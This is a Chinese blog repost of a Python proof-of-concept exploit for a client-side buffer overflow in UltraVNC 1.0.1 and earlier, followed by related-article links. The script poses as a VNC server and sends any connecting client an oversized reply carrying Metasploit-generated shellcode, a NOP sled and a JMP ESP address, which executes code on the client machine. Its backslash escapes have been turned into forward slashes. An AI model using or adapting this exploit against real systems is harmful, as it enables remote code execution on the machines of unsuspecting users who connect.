Ultr@VNC <= 1.0.1 client Log::ReallyPrint Buffer Overflow Exploit

最新推荐文章于 2024-12-27 10:43:01 发布
转载 最新推荐文章于 2024-12-27 10:43:01 发布 · 1k 阅读 · 0
文章标签:

#buffer #server #stream #header #socket #struct

本文提供了一个针对Ultr@VNC 1.0.1版本客户端的缓冲区溢出漏洞概念验证代码(PoC),该漏洞可用于触发远程代码执行。通过构造特定的数据包并发送到VNC服务器,可以利用此漏洞执行任意代码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

#!/usr/bin/python

#Ultr@VNC 1.0.1 Client Buffer Overflow - Luigi Auriemm
#POC by Paul Haas at Redspin.com
#Tested on WinXP SP 2: Launches Calc
import socket, struct

HOST = ''                       # Localhost
PORT = 5900                     # VNC Server
BOFSZ = 1024                    # Buffer Size
HEAD = "RFB 003.006/n"          # VNC Header
MESSAGE = "Requires Ultr@VNC Authentication/n"
NOP = "/x90"                    # Standard x86 NOP
JMP = "/xE9/x1B/xFC/xFF/xFF"    # JMP To BUFF
ESP = "/xE0/x3A/xB4/x76"        # winmm.dll: JMP %esp
POP = "PASSWORD"                # RET 8

# win32_exec - CMD=calc Size=160 http://metasploit.com
SHELLCODE = /
"/x31/xc9/x83/xe9/xde/xd9/xee/xd9/x74/x24/xf4/x5b/x81/x73/x13/xe1"+/
"/x7c/x05/xd9/x83/xeb/xfc/xe2/xf4/x1d/x94/x41/xd9/xe1/x7c/x8e/x9c"+/
"/xdd/xf7/x79/xdc/x99/x7d/xea/x52/xae/x64/x8e/x86/xc1/x7d/xee/x90"+/
"/x6a/x48/x8e/xd8/x0f/x4d/xc5/x40/x4d/xf8/xc5/xad/xe6/xbd/xcf/xd4"+/
"/xe0/xbe/xee/x2d/xda/x28/x21/xdd/x94/x99/x8e/x86/xc5/x7d/xee/xbf"+/
"/x6a/x70/x4e/x52/xbe/x60/x04/x32/x6a/x60/x8e/xd8/x0a/xf5/x59/xfd"+/
"/xe5/xbf/x34/x19/x85/xf7/x45/xe9/x64/xbc/x7d/xd5/x6a/x3c/x09/x52"+/
"/x91/x60/xa8/x52/x89/x74/xee/xd0/x6a/xfc/xb5/xd9/xe1/x7c/x8e/xb1"+/
"/xdd/x23/x34/x2f/x81/x2a/x8c/x21/x62/xbc/x7e/x89/x89/x8c/x8f/xdd"+/
"/xbe/x14/x9d/x27/x6b/x72/x52/x26/x06/x1f/x64/xb5/x82/x7c/x05/xd9"

#buff = MESSAGE+SHELLCODE+NOP SLED+RET ADDR+USELESS+JUMP TO BUFF
buff = MESSAGE+SHELLCODE+NOP*(BOFSZ-11-len(MESSAGE)-len(SHELLCODE))
buff = buff+ESP+POP+JMP

#Egg = VNC Server Error Reply and Size of Reply + buff
egg = struct.pack('LL',socket.htonl(0),socket.htonl(len(buff)))+buff

print 'Ultr@VNC 1.0.1 Client Buffer Overflow - Luigi Auriemma'
print 'POC by Paul Haas at Redspin.com'
print 'Server listening on port', PORT

#Server Loop
while(1):
       s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       s.bind((HOST, PORT))
       s.listen(1)

       conn, addr = s.accept()
       print 'Connection by', addr

       conn.send(HEAD)
       data = conn.recv(12)

       conn.send(egg)
       conn.close()


 
UltraVNC 使用方法详细说明
m0_64483960的博客
04-27 2万+
UltraVNC 使用方法详细说明以及防火墙设置
vnc后台隐藏运行
weixin_34273046的博客
02-28 1929
Ultr@VNC 的使用方法 最近准备使用VNC,百度一下转载文章。留着备用 又快又实用的远程控制法宝 现在很多家庭已经拥有两台电脑,虽然方便了使用,但也带来了一些操作麻烦,要不停地换用键盘、鼠标,同样的问题也出现在了学校宿舍中。要想解决这一问题你最先想到的一定就是远程控制软件。 我们在以前的期刊中已经介绍过一些具有特殊功能的远程控制软件,...
服务器远程控制便捷工具——Ultra@VNC
weixin_30552811的博客
12-13 267
对于局域网服务器管理人员来说,要是对服务器的任何维护操作都要到服务器所在计算机的现场去进行的话,那么服务器的维护效率肯定不是很高,而且还会把网络管理人员累坏!为了有效提高服务器的维护效率,不少人都通过Windows 2003服务器中的远程桌面Web连接功能,来在其他任意可以联网的计算机中,对服务器进行各种方式的远程维护和管理。不过,通过这种方法对服务器进行远程控制,需要进行很复杂的设置;显然这种方...
Ultr@VNC编译方法
zzz_781111的专栏
07-01 961
Ultr@VNC编译方法,安装win32 sdk,安装platform sdk然后按下面设置include filesD:/PLATFORM/INCLUDEC:/Program Files/Microsoft Visual Studio/VC98/INCLUDEC:/Program Files/Microsoft Visual Studio/VC98/MFC/INCLUDE
UltraVNC:一款高层玩家使用的远程控制软件
07-09 9546
方案二: 给个思路吧:同步网盘+vnc反向连接+单方公网ip+自己编程。可以替代 teamviewer。 怎么说呢? 首先,我介绍一下自己的情况,我有一台机器需要远程控制,但是在内网,也不能通过端口映射出来。但是控制端,却有公网ip,所以,如果要控制那台内网的机器,需要利用 vnc 的反向连接功能,这不难,难的是,怎样让内网的机器知道什么时候需要主动发起反向连接。这就要有个办法来通知内网的机器。 这时就轮到同步网盘上场了,比如坚果云,syncthing,verysync,resilio,one dri..
Ultr@VNC 1.0.1源代码解析:自由软件远程控制的实现
标题:“Ultr@VNC 1.0.1源代码”所指的知识点: - VNC(Virtual Network Computing)是一种远程控制软件,它允许用户从一台计算机远程访问和控制另一台计算机。 - 该标题表明提供的是一个名为Ultr@VNC版本1.0.1...
UltraVNC_1.0.8.2_vncviewer.zip
10-18
UltraVNC_1.0.8.2_vncviewer.zip UltraVNC_1.0.8.2_vncviewer.zip UltraVNC_1.0.8.2_vncviewer.zip UltraVNC_1.0.8.2_vncviewer.zip
【UltraVNC】VNC服务端单机版制作 即UltraVNC SC (Single Click)
Best_lgx的博客
12-27 719
简单、方便、免安装、打开即用、体积小;用户点击对应连接名称即可发起连接,不用像UltraVNC Server再手动输入view端的服务器IP 和端口 (中继模式 还需多输入一个 ID号)。UltraVNC SC是一个小型(166k) UltraVNC服务器,可以定制和预配置,供客户下载。UltraVNC SC不需要安装,也不使用注册表。客户只需下载小的可执行文件,然后点击建立连接。连接由服务器发起,以允许通过客户防火墙轻松访问。
黑客攻防实战案例解析:UltraVNC安全防护策略
章节中还提到了加密传输(如Ultr@VNC的实际应用)和安全配置的重要性,比如选择合适的VNC客户端,确保只有授权用户可以连接,并且需要定期更新软件以修补已知漏洞。书中可能还会涉及如何通过IP地址管理和防火墙规则...
VNC_Windows_Server_Client.zip
05-09
Windows平台的VNC客户端和服务端安装包,安装后可远程访问、控制Windows系统,跟其他远程访问软件一样,但是VNC更轻巧、便捷。
UltraVnc 设置的一些事情
weixin_34055787的博客
11-07 983
在vncproperties.cpp里面vncProperties::ShowAdmin(BOOL show, BOOL usersettings), 里面用来启动 设置vnc server设置的页面, 然后在vncproperties.cpp 里面的 vncProperties::DialogProc(HWND hwnd, UINT uMsg, WPARAM...
UltraVNC在域环境下批量部署并进行统一的设置
weixin_45828368的博客
04-03 1906
公司办公电脑加域之后,因部门太多,每个部门所使用的软件也不尽相同,同一个部门不同岗位的人员用的软件还不一样。所以呢,封装系统也只能解决同一部门使用相同的软件的情况,公司人数少的时候可以悠哉游哉的授权安装,但是随着公司人员越来越多,从上班开始屁股基本就挨不着凳子,那么工位也就形同虚设。经过自己的摸索慢慢的也完成了部署,为了防止遗忘,就把这次部署经历记录下来,刚好也可以分享给大家。因为要在域环境下批量部署,因此最方便的也就是使用域控制器下发组策略来进行安装,只要组策略设置完毕,客户端重启后就会自动安装。
转化问题学生的六种激励法.doc
最新发布
08-10
转化问题学生的六种激励法.doc
一个基于Java编写的聊天软件,支持好友列表,窗口多开,JSP Web注册账户 分Client端和Server
08-10
一个基于Java编写的聊天软件,支持好友列表,窗口多开,JSP Web注册账户。分Client端和Server端。
安全设计“左移”:DevSecOps 成为编码起点.doc
08-10
安全设计“左移”:DevSecOps 成为编码起点.doc
酒店管理系统概要设计说明书.doc
08-10
酒店管理系统概要设计说明书.doc
幼儿园助理工作总结.doc
08-10
幼儿园助理工作总结.doc
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值